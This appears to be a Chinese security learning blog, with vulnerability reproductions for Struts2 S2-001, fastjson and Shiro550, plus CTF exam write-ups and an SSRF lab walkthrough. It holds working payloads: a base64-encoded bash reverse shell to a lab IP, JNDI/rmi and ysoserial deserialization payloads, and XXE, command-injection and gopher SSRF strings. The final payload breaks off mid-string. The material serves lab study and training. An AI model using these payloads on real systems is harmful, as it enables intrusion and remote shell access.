2025-01-25

s2-001OGNL命令执行

概述

产生原因

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行

影响

参考链接1

环境搭建

1
2
3


cd struts2/s2-001
docker-compose up -d

复现

抓取登陆包

构造执行ls -a的payload

username=admin&password=%25{%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{"ls","-a"})).redirectErrorStream(true).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23f%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23f.getWriter().println(new+java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()}

攻防

利用

GitHub xfiftyone/STS2G: Struts2漏洞扫描利用工具 Golang版. Struts2 Scanner Written in Golang

GitHub HatBoy/Struts2-Scan: Struts2全漏洞扫描利用工具

防御

升级Struts到2.0.9或升级XWork到2.0.4

参考

S2-001 Apache Struts 2 Wiki Apache Software Foundation

2025-01-23

奇技淫巧

终端程序走burp代理

引子

今日在使用burp时有需要将某些终端中软件的流量跑到burp中去分析。最后使用proxychains去实现。

创建proxychains代理配置文件

我自己有在用proxychains做终端中的科学上网代理。这次使用一个新的配置文件去编写

strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# your burp proxy config
http    127.0.0.1  8080

在系统级别添加burp的证书

linux下添加证书

1
2
3

mkdir -p /usr/local/share/ca-certificates/burp
cp your_ca.der /usr/local/share/ca-certificates/burp/burp.der
update-ca-trust

使用样例

1 2	proxychains -f your_proxychains_config.config your_cmd

alinas

1
2
3


# -q 让proxychains不输出日志
alias pp='proxychains -q -f ~/tools/burp/proxychains.conf'

2025-01-16

漏洞复现

fastjson反序列化

概述

fastjson是java中解析json的库。

产生原因

在json字符串中存在@type属性时，fastjson会将该字符串解析为其指定的类。导致不受信任的类被反序列化。

影响

代码执行等

小于等于1.2.68

环境搭建

1
2
3


cd fastjson/1.2.24-rce
docker-compose up -d

复现

发送一个json请求

Exp构造

import java.lang.Runtime;
import java.lang.Process;
public class Exp {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash","-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTgzLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

同时开启rmi和python监听

发送请求，反弹shell

payload

1
2
3

{
    "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.2.183:9998/Exploit","autoCommit":true}
}

攻防

利用

对于其他版本的fastjson

1.2.24(首个漏洞)–>1.2.41(黑名单绕过)–>1.2.42(黑名单绕过)–>1.2.45(新利用链)–>1.2.47(AutoType绕过)–>1.2.68(AutoType绕过)

防御

升级版本。新版本fastjson删除了@type特性，从根源上防止反序列化发生

参考

JAVA入门到放弃系列之Fastjson反序列化(一)

2025-01-13

Web安全

SqlInject

概述

产生原因

开发者未严格过滤用户传入的参数，导致恶意sql语句拼接到了sql语句中。

影响

拖库

修改数据库数据

获取网站控制权

分类

根据利用方式划分

联合查询注入

报错注入

布尔盲注

时间盲注

根据sql语句类型分

select型(最常见)

update型

insert型

delete型

特殊注入方式

宽字节注入

二次编码注入

二阶注入

堆叠注入

挖掘

黑盒

手动一般测试方法：

实现网站正常功能

测试闭合符号

寻找回显位

获取信息

白盒

php重点函数mysqli_query

观察执行sql语句的位置是否存在不安全拼接

攻防

利用

mysql中获取数据库信息

mysql写shell

日志

INTO OUTFILE

防御

PDO预处理

最小化数据库权限

站库分离

绕过防御

各种编码

其他

工具

[[sqlmap]]

靶场

[[sqli-labs]]

文章

2025-01-13

漏洞复现

CVE-2016-4437

概述

Shiro550，也称为Apache Shiro反序列化漏洞

产生原因

Shiro框架在处理记住密码功能（RememberMe）时使用的默认或可预测的AES加密密钥。导致攻击者可构造出恶意序列化数据。

流程:

用户登陆时勾选Remember Me

服务端校验并返回加密后的Cookie

数据加密过程:用户序列化数据-> AES加密-> base64编码

勾选RememberMe后登陆成功返回的包

影响

Apache Shiro 1.2.4及以前

命令执行

环境搭建

使用vulhub提供的docker-compose.yml搭建

1 2	cd shiro/CVE-2016-4437 docker-compose up -d

复现

漏洞特征:

登陆时相应包中存在Set-Cookie: rememberMe=deleteMe;

验证漏洞存在:

使用URLDNS反序列化链进行dns外带。检测是否存在反序列化漏洞。

复现步骤:

尝试登陆，在返回包中发现特征Set-Cookie: rememberMe=deleteMe;

生成payload

1	java -jar ysoserial-all.jar URLDNS "http://lu5bzg.dnslog.cn" > poc.ser

构造Cookie

构造代码请参考vulhub

携带Cookie发送请求

查看dnslog平台

已有解析过来了。证明存在反序列化漏洞

攻防

利用

利用反序列化链CommonsBeanutils1进行命令执行

反弹shell，生成payload

1	java -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTgzLzQ0NDQgMD4mMQ==}\|{base64,-d}\|{bash,-i}" > poc.ser

构造Cookie并发起请求

工具

GitHub frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

GitHub SummerSec/ShiroAttack2: shiro反序列化漏洞综合利用,包含（回显执行命令/注入内存马）修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack

防御

更新shiro到1.2.4以上的版本

自定义AES密钥。配置文件:shiro.ini

参考

Vulhub Docker-Compose file for vulnerability environment

shiro反序列化漏洞原理分析以及漏洞复现 FreeBuf网络安全行业门户

2025-01-11

changeme

Sec-Linux常用命令

引子

正文

参考

2025-01-10

exam

week9_kls_exam

题目1

上传webshell

蚁剑连接，发现了小黑子

告诉俺flag不再这里，难不成你还有内网机器？

看看/etc/hosts

开始爆破

emmm直接就是各命令执行，开整

payload

命令执行

cmd=id&cat flag.php

ssrf

url=gopher%3A%2F%2F192.168.9.11%3A80%2F_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%39%25%32%65%25%33%31%25%33%31%25%33%61%25%33%38%25%33%30%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%32%25%33%31%25%30%64%25%30%61%25%34%33%25%36%31%25%36%33%25%36%38%25%36%35%25%32%64%25%34%33%25%36%66%25%36%65%25%37%34%25%37%32%25%36%66%25%36%63%25%33%61%25%32%30%25%36%64%25%36%31%25%37%38%25%32%64%25%36%31%25%36%37%25%36%35%25%33%64%25%33%30%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%32%64%25%34%63%25%36%31%25%36%65%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%61%25%32%30%25%37%61%25%36%38%25%32%64%25%34%33%25%34%65%25%32%63%25%37%61%25%36%38%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%39%25%30%64%25%30%61%25%34%66%25%37%32%25%36%39%25%36%37%25%36%39%25%36%65%25%33%61%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%38%25%32%65%25%33%31%25%33%34%25%33%30%25%32%65%25%33%32%25%33%32%25%33%39%25%32%65%25%33%31%25%33%32%25%33%61%25%33%31%25%33%30%25%33%30%25%33%30%25%33%30%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%35%35%25%37%30%25%36%37%25%37%32%25%36%31%25%36%34%25%36%35%25%32%64%25%34%39%25%36%65%25%37%33%25%36%35%25%36%33%25%37%35%25%37%32%25%36%35%25%32%64%25%35%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%37%33%25%33%61%25%32%30%25%33%31%25%30%64%25%30%61%25%35%35%25%37%33%25%36%35%25%37%32%25%32%64%25%34%31%25%36%37%25%36%35%25%36%65%25%37%34%25%33%61%25%32%30%25%34%64%25%36%66%25%37%61%25%36%39%25%36%63%25%36%63%25%36%31%25%32%66%25%33%35%25%32%65%25%33%30%25%32%30%25%32%38%25%35%37%25%36%39%25%36%65%25%36%34%25%36%66%25%37%37%25%37%33%25%32%30%25%34%65%25%35%34%25%32%30%25%33%31%25%33%30%25%32%65%25%33%30%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%33%36%25%33%34%25%33%62%25%32%30%25%37%38%25%33%36%25%33%34%25%32%39%25%32%30%25%34%31%25%37%30%25%37%30%25%36%63%25%36%35%25%35%37%25%36%35%25%36%32%25%34%62%25%36%39%25%37%34%25%32%66%25%33%35%25%33%33%25%33%37%25%32%65%25%33%33%25%33%36%25%32%30%25%32%38%25%34%62%25%34%38%25%35%34%25%34%64%25%34%63%25%32%63%25%32%30%25%36%63%25%36%39%25%36%62%25%36%35%25%32%30%25%34%37%25%36%35%25%36%33%25%36%62%25%36%66%25%32%39%25%32%30%25%34%33%25%36%38%25%37%32%25%36%66%25%36%64%25%36%35%25%32%66%25%33%31%25%33%33%25%33%31%25%32%65%25%33%30%25%32%65%25%33%36%25%33%37%25%33%37%25%33%38%25%32%65%25%33%38%25%33%36%25%32%30%25%35%33%25%36%31%25%36%36%25%36%31%25%37%32%25%36%39%25%32%66%25%33%35%25%33%33%25%33%37%25%32%65%25%33%33%25%33%36%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%33%61%25%32%30%25%37%34%25%36%35%25%37%38%25%37%34%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%38%25%37%34%25%36%64%25%36%63%25%32%62%25%37%38%25%36%64%25%36%63%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%64%25%36%63%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%39%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%36%31%25%37%36%25%36%39%25%36%36%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%37%37%25%36%35%25%36%32%25%37%30%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%36%31%25%37%30%25%36%65%25%36%37%25%32%63%25%32%61%25%32%66%25%32%61%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%38%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%33%25%36%39%25%36%37%25%36%65%25%36%35%25%36%34%25%32%64%25%36%35%25%37%38%25%36%33%25%36%38%25%36%31%25%36%65%25%36%37%25%36%35%25%33%62%25%37%36%25%33%64%25%36%32%25%33%33%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%37%25%30%64%25%30%61%25%35%32%25%36%35%25%36%36%25%36%35%25%37%32%25%36%35%25%37%32%25%33%61%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%38%25%32%65%25%33%31%25%33%34%25%33%30%25%32%65%25%33%32%25%33%32%25%33%39%25%32%65%25%33%31%25%33%32%25%33%61%25%33%31%25%33%30%25%33%30%25%33%30%25%33%30%25%32%66%25%37%36%25%37%35%25%36%63%25%36%65%25%35%66%25%36%39%25%36%62%25%37%35%25%36%65%25%32%65%25%37%30%25%36%38%25%37%30%25%33%66%25%37%35%25%37%32%25%36%63%25%33%64%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%39%25%32%65%25%33%31%25%33%31%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%32%64%25%34%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%39%25%36%65%25%36%37%25%33%61%25%32%30%25%36%34%25%36%35%25%36%36%25%36%63%25%36%31%25%37%34%25%36%35%25%32%63%25%32%30%25%36%32%25%37%32%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%62%25%36%35%25%36%35%25%37%30%25%32%64%25%36%31%25%36%63%25%36%39%25%37%36%25%36%35%25%30%64%25%30%61%25%30%64%25%30%61%25%36%33%25%36%64%25%36%34%25%33%64%25%36%39%25%36%34%25%32%35%25%33%32%25%33%36%25%36%33%25%36%31%25%37%34%25%32%62%25%36%36%25%36%63%25%36%31%25%36%37%25%32%65%25%37%30%25%36%38%25%37%30

flag{4104d0bdc968e8709b51f71cb3c755790e15e4df}

题目2

密码123456登陆成功

看起来好像有sql注入？？不管了，梭哈

timu2

POST /get_students.php HTTP/1.1
Host: 8.140.229.12:10001
Content-Length: 30
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://8.140.229.12:10001
Referer: http://8.140.229.12:10001/students.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=df31b1421a4fd4fff8f4b519d8afcd5f
Connection: keep-alive
{"id":"","name":"","grade":""}

flag{5e5326c0a2d2b4ce3e481f8bdd7f0da6}

题目3

扫描路径

没啥东西啊，登陆一下看看。有万能密码，但是很奇怪，没有任何跳转。

发现登陆接口是这个样子的，一眼xxe

回显位在uuid上。尝试包含/etc/passwd成功

包含flag.php报错，但是扫到该文件了。尝试使用伪协议进base64编码

payload

1	<!DOCTYPE root [<!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=/var/www/html/flag.php'>]><login><user>admin'or 1=1#</user><pass>123213</pass><uuid>&test;</uuid></login>

flag{550c41a03d1646a97b7a68e6718e94ab}

题目4

存在文件包含，尝试查看源码

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>首页</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f9f9f9;
            color: #333;
        }
        header {
            background-color: #0078D7;
            color: white;
            padding: 20px;
            text-align: center;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        nav {
            margin: 20px auto;
            text-align: center;
        }
        nav a {
            display: inline-block;
            margin: 10px 20px;
            padding: 10px 20px;
            text-decoration: none;
            color: #0078D7;
            border: 2px solid #0078D7;
            border-radius: 5px;
            font-weight: bold;
            transition: all 0.3s;
        }
        nav a:hover {
            background-color: #0078D7;
            color: white;
        }
        footer {
            text-align: center;
            padding: 10px 20px;
            background-color: #f1f1f1;
            border-top: 1px solid #ddd;
            margin-top: 20px;
        }
    </style>
</head>
<body>
<header>
    <h1>欢迎来到首页</h1>
</header>
<nav>
    <a href="index.php">首页</a>
    <a href="index.php?file=test.php">猜猜这是什么 - Page 1</a>
    <a href="index.php?file=class.php">猜猜这是什么 - Page 2</a>
    <a href="index.php?file=flag.php">Flag</a>
</nav>
<footer>
    &copy; 2025 cybersecurity
</footer>
</body>
</html>
<?php
    if (isset($_GET['file'])) {
        if(preg_match('/flag/', $_GET['file'])) {
            exit("hacker~");
        }else{
            include($_GET['file']);
        }
    }
?>

class.php

<?php
class Main{
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new Test3();
    }
    function __wakeup() {
        $this->ClassObj->action();
    }
}
class Output{
    function action() {
        echo "hello chaitin";
    }
}
class Test3{
    public $data;
    public $str = "phpinfo();";
    function action() {
        echo file_get_contents($this->data);
    }
    function info()
    {
        @eval($this -> str);
    }
}

test.php

<?php
    echo "flag在flag.php";
    require "class.php";
    @unserialize($_GET['nb']);

一眼反序列化，尝试包含/etc/passwd

index.php中的过滤好像并管不到nb这个参数，我们直接包含flag.php

生产payload

<?php
class Main{
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new Test3();
    }
}
class Test3{
    public $data;
		public function __construct() {
			$this->data = "/var/www/html/index.php";
		}
}
$m = new Main();
echo serialize($m);
?>

payload

1	?file=test.php&nb=O:4:"Main":1:{s:8:"ClassObj";O:5:"Test3":1:{s:4:"data";s:22:"/var/www/html/flag.php";}}

flag{92d5c6f8df9f7f5a711157446fbc1915}

2025-01-03

exam

week8_kls_exam

题目1

555不是管理员

看了看曲奇饼，发现是base64的用户名，直接伪造一个

反弹个shell拿flag

flag{4833f846682676c86360fa717f423c88}

题目2

早知道还是原道，直接购买-10000个原道，商家给了返利，含泪买下flag

flag{fb5c50b9dda4ddacaedf622878199ebc}

题目3

扫到了admin.php

但是得登陆，俺登陆不上去

尝试万能密码

发现admin.php能看了

flag{b6acd4cdd256c54704b09f12c1585a51}

题目4

猜不到密码改改曲奇饼

看看upload.php的代码

<?php
//session_start();
//
//// 检查用户是否登录
//if (!isset($_SESSION['user_id'])) {
//    header("Location: login.php");
//    exit();
//}
if ($_COOKIE["is_login"] == "false") {
    header("Location: login.php");
    exit();
}
// 定义上传文件的目标目录
$target_dir = "uploads/";
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['fileToUpload'])) {
    // 🐮🍺 🐮🍺 🐮🍺 🐮🍺 🐮🍺 🐮🍺
    $filename = date("Ymd").rand(000,999).basename($_FILES['fileToUpload']['name']);
    $target_file = $target_dir . $filename;
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    // 检查文件大小（限制 5MB）
    if ($_FILES['fileToUpload']['size'] > 5000000) {
        echo "Sorry, your file is too large.";
        $uploadOk = 0;
    }
    // 只允许特定类型的文件上传
    if($imageFileType != "jpg" && $imageFileType != "jpeg" && $imageFileType != "zip") {
        echo "Sorry,  files are allowed.";
        $uploadOk = 0;
    }
    // 检查 $uploadOk 是否为 0（表示文件上传失败）
    if ($uploadOk == 0) {
        echo "Sorry, your file was not uploaded.";
    } else {
        // 尝试上传文件
        if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $target_file)) {
            echo "The file has been uploaded.";
        } else {
            echo "Sorry, there was an error uploading your file.";
        }
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>File Upload</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
<?php include("includes/header.php"); ?>
<h2>文件上传</h2>
<form action="upload.php" method="post" enctype="multipart/form-data">
    选择一个文件上传<br/>
    <p style="color: red">提示：flag文件在 /flag.txt</p>
    <input type="file" name="fileToUpload" id="fileToUpload" required>
    <button type="submit" value="Upload File">上传</button>
</form>
<?php include("includes/footer.php"); ?>
</body>
</html>

得爆破，开干

这个写错了，实际上文件应该长得这样年月日xxxfilename
xxx为000-999,filename为文件名

上传zip使用phar解析，使用蚂剑连接

添加曲奇饼，结束

flag{e723e6038bc25659e0675ba068e041a2}

2024-12-30

range

ssrf-vuls

搭建

docker-compose.yml

version: '2'
networks:
  ssrf_v:
    ipam:
      config:
         - subnet: 172.72.23.0/24
          gateway: 172.72.23.1
services:
  ssrfweb1:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v1
    ports:
     - 8088:80
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.21
  ssrfweb2:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v2
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.22
  ssrfweb3:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v3
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.23
  ssrfweb4:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v4
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.24
  ssrfweb5:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v5
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.25
  ssrfweb6:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v6
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.26
  ssrfweb7:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v7
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.27

介绍

国光大佬的ssrf靶场。

共7个服务，1个外网，6个内网。

过关

web1

只有一个框，我们尝试一下实现正常功能

存在ssrf,尝试读取本地文件

获取flag

flag:This is flag

其余关卡的过关准备

存在6个内网靶机，访问不到，一切未知。我们尝试通过ssrf进行内网探测。

探测前的准备

本机的ip

获取ip的意义是获取c段网络地址

读取/etc/hosts或/proc/net/arp或/proc/net/fib_trie获取本机ip

显而易见，当前c段网络地址为172.72.23.0

dict探测端口

1	dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>

端口探测

实际上在本靶场中，我们无法得知，这里我们选择爆破c段ip的常见端口。

使用bp进行爆破

配置爆破参数

paylaod1 c段ip

payload2 top100常见端口

开干，这个步骤可以整个py脚本过滤掉回显位置为空的地方。

这是我们搜索到的结果

我们快速进行获取paylaod

选中这些探测成功的payload,导出

注意要取消选择这个base64-encode

从导出文件中提取信息

扫描结果


url=dict%3A%2F%2F172.72.23.22%3A80]]></request>
url=dict%3A%2F%2F172.72.23.23%3A80]]></request>
url=dict%3A%2F%2F172.72.23.24%3A80]]></request>
url=dict%3A%2F%2F172.72.23.25%3A80]]></request>
url=dict%3A%2F%2F172.72.23.26%3A8080]]></request>
url=dict%3A%2F%2F172.72.23.27%3A6379]]></request>

内网172.172.23.22

访问发现是一个啥也没有的页面

尝试一下目录扫描，这里字典使用的是dirsearch的

1	ffuf -u "http://localhost:8088/" -H "Content-Type: application/x-www-form-urlencoded" -d "url=http%3A%2F%2F172.72.23.22%2FFUZZ" -w dicc.txt -fw 0-413

扫描结果如下

我们挨个访问，发现phpinfo.php,shell.php是存在的

shell.php可以直接getshell

内网172.72.23.23

告诉俺存在sql注入

内网172.72.23.24

一眼存在命令执行，但是他这个表单提交时是POST

使用gopher协议

gopher://[host]:[port]/[type][selector]

浅浅构造一个post包

POST / HTTP/1.1
Host: 172.72.23.24
Content-Length: 15
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.2.183:8088
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.2.183:8088/
Connection: keep-alive
ip=127.0.0.1;id

将其进行二次url编码拼接到gopher后即可

payload

gopher:%2f%2f172.72.23.24:80/_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%37%25%33%32%25%32%65%25%33%32%25%33%33%25%32%65%25%33%32%25%33%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%31%25%33%35%25%30%64%25%30%61%25%34%33%25%36%31%25%36%33%25%36%38%25%36%35%25%32%64%25%34%33%25%36%66%25%36%65%25%37%34%25%37%32%25%36%66%25%36%63%25%33%61%25%32%30%25%36%64%25%36%31%25%37%38%25%32%64%25%36%31%25%36%37%25%36%35%25%33%64%25%33%30%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%32%64%25%34%63%25%36%31%25%36%65%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%61%25%32%30%25%37%61%25%36%38%25%32%64%25%34%33%25%34%65%25%32%63%25%37%61%25%36%38%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%39%25%30%64%25%30%61%25%34%66%25%37%32%25%36%39%25%36%37%25%36%39%25%36%65%25%33%61%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%32%25%32%65%25%33%31%25%33%38%25%33%33%25%33%61%25%33%38%25%33%30%25%33%38%25%33%38%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%35%35%25%37%30%25%36%37%25%37%32%25%36%31%25%36%34%25%36%35%25%32%64%25%34%39%25%36%65%25%37%33%25%36%35%25%36%33%25%37%35%25%37%32%25%36%35%25%32%64%25%35%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%37%33%25%33%61%25%32%30%25%33%31%25%30%64%25%30%61%25%35%35%25%37%33%25%36%35%25%37%32%25%32%64%25%34%31%25%36%37%25%36%35%25%36%65%25%37%34%25%33%61%25%32%30%25%34%64%25%36%66%25%37%61%25%36%39%25%36%63%25%36%63%25%36%31%25%32%66%25%33%35%25%32%65%25%33%30%25%32%30%25%32%38%25%35%37%25%36%39%25%36%65%25%36%34%25%36%66%25%37%37%25%37%33%25%32%30%25%34%65%25%35%34%25%32%30%25%33%31%25%33%30%25%32%65%25%33%30%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%33%36%25%33%34%25%33%62%25%32%30%25%37%38%25%33%36%25%33%34%25%32%39%25%32%30%25%34%31%25%37%30%25%37%30%25%36%63%25%36%35%25%35%37%25%36%35%25%36%32%25%34%62%25%36%39%25%37%34%25%32%66%25%33%35%25%33%33%25%33%37%25%32%65%25%33%33%25%33%36%25%32%30%25%32%38%25%34%62%25%34%38%25%35%34%25%34%64%25%34%63%25%32%63%25%32%30%25%36%63%25%36%39%25%36%62%25%36%35%25%32%30%25%34%37%25%36%35%25%36%33%25%36%62%25%36%66%25%32%39%25%32%30%25%34%33%25%36%38%25%37%32%25%36%66%25%36%64%25%36%35%25%32%66%25%33%31%25%33%33%25%33%31%25%32%65%25%33%30%25%32%65%25%33%36%25%33%37%25%33%37%25%33%38%25%32%65%25%33%38%25%33%36%25%32%30%25%35%33%25%36%31%25%36%36%25%36%31%25%37%32%25%36%39%25%32%66%25%33%35%25%33%33%25%33%37%25%32%65%25%33%33%25%33%36%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%33%61%25%32%30%25%37%34%25%36%35%25%37%38%25%37%34%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%38%25%37%34%25%36%64%25%36%63%25%32%62%25%37%38%25%36%64%25%36%63%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%64%25%36%63%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%39%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%36%31%25%37%36%25%36%39%25%36%36%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%37%37%25%36%35%25%36%32%25%37%30%25%32%63%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%66%25%36%31%25%37%30%2